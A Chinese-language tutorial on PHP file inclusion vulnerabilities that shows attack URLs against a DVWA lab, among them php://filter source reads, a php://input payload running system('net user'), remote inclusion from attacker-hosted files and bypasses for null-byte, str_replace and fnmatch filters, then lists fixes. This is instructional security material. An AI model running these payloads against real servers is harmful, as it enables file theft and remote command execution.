文件包含漏洞详解

漏洞原理:程序员开发web应用程序的时候,未对用户可控的包含文件进行严格过滤,导致攻击者可构造自己木马文件被包含,从而执行恶意代码。漏洞关键:包含的文件用户可控

    文件包含:开发语言为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。

    产生漏洞的原因:在包含文件时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞

    php文件包含函数:include( ),include_once( ),require( ),require_once( )。其中include( ),include_once( )当遇到被包含文件的代码执行错误时,会给出一个警告,并继续执行下面的代码。require( ),require_once( )当遇到被包含文件的代码执行错误时函数会输出错误信息,并终止脚本的运行

漏洞分类:

    文件包含支持的协议:

        data:text/plain 或 data:text/plain;base64

        php://input

        php://filter

        file://

        zip://

    本地文件包含漏洞:当被包含的文件在服务器本地时,就形成了本地文件包含

    远程文件包含漏洞:当被包含的文件在远程服务器上时,就形成了远程文件包含

        远程文件包含需要开启allow_url_include=on 以及allow_url_fopen=on和关闭 magic_quotes_gpc=off

        所包含远程服务器的文件后缀不能与目标服务器语言相同。(比如目标服务器是php脚本语言解析的,那么包含的远程服务器文件后缀不能是php)


常用挖掘方法:

    1. 查看源代码寻找include(),include_once(),require()和require_once()函数。

    2.在URL的查询参数中寻找类似?page=a.php , ?home=b.html ,?file=content… 的地方。

常用攻击:

      一个要点:文件包含可以包含任意文件,即便被包含的文件与当前编程语言无关,甚至为图片,只要文件被包含,其符合当前脚本语言语法的内容都会执行,不符合当前脚本语言语法的,会直接将文件内容输出

    1. 文件遍历读取,从而读取系统的敏感信息

    2. 上传带有木马的文件如图片,然后包含木马文件getshell

    3. 通过php协议包含输入命令,从而执行php命令

    4.包含日志文件


典型攻击:

    后台的典型代码:

       <?php

    $filename  = $_GET['filename'];

    include($filename);

    ?>

    典型攻击URL:

   构造URL: http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php

     构造URL: http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input,并且提交post数据为:<?php system('net user');?>


防御&绕过:

    1. 限制本地包含文件只能是php文件

    绕过方法1:%00 截断

  条件:magic_quotes_gpc = Off PHP 版本<5.3.4

  测试:?filename=../../../../../../boot.ini%00

    绕过方法2:路径长度截断

  条件:windows下目录路径最大长度为256字节,超出部分将丢弃;

       Linux下目录最大长度为4096字节,超出长度将丢弃

  测试:?filename=text.txt././././.  或?filename=test.txt.....

    2. 远程文件包含防御与绕过:

当服务器的php.ini的配置选项allow_url_fopen和allow_url_include为On,则include/require函数式可加载远程文件的。

    2.1有限制远程包含绕过

 测试代码:<?php include($_GET['filename'].".html");?>  多添加了html后缀,到最后远程包含的文件 一会多一个HTML后缀

问号绕过

  测试:?filename=http://192.168.91.133/FI/php.txt?

#号绕过

  测试:?filenamr=http://192.168.91.133/FI/php.txt%23

可通过%00截断绕过

  测试:?filename=http://192.168.91.133/FI/php.txt%00

3.str_replace函数绕过:

使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。

例如:page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103/phpinfo.txt,成功执行远程命令。

远程文件包含:http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt

本地文件包含:http://192.168.0.103/dvwa/vulnerabilities/fi/page=..././..././..././..././..././xampp/htdocs/dvwa/php.ini

4.因为替换的只是“../”、“..\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。

    绝对路径不受任何影响

http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini

5. fnmatch函数绕过:

if(!fnmatch("file*",$file)&&$file!="include.php"),当文件既不是"include.php"也不是"file*"(文件名file开头)时才抛出错误,反之意思,如果文件名符合其中一个条件既可以。

构造URL:http://192.168.0.103/dvwa/vulnerabilities/fi/page=file:///C:/xampp/htdocs/dvwa/php.ini

page=file:///C:/xampp/htdocs/dvwa/php.ini 刚好满足"file*"(文件名file开头)所以成功读取了服务器的配置文件。

修复方法:

    PHP中可使用open_basedir配置限制访问限制在指定的区域

    过滤.(点)/(反斜杠)\(斜杠)

    禁止服务器远程文件包含

好的参考://www.greatytc.com/p/3514f0fd79f7

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,919评论 6 502
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,567评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 163,316评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,294评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,318评论 6 390
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,245评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,120评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,964评论 0 275
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,376评论 1 313
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,592评论 2 333
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,764评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,460评论 5 344
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,070评论 3 327
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,697评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,846评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,819评论 2 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,665评论 2 354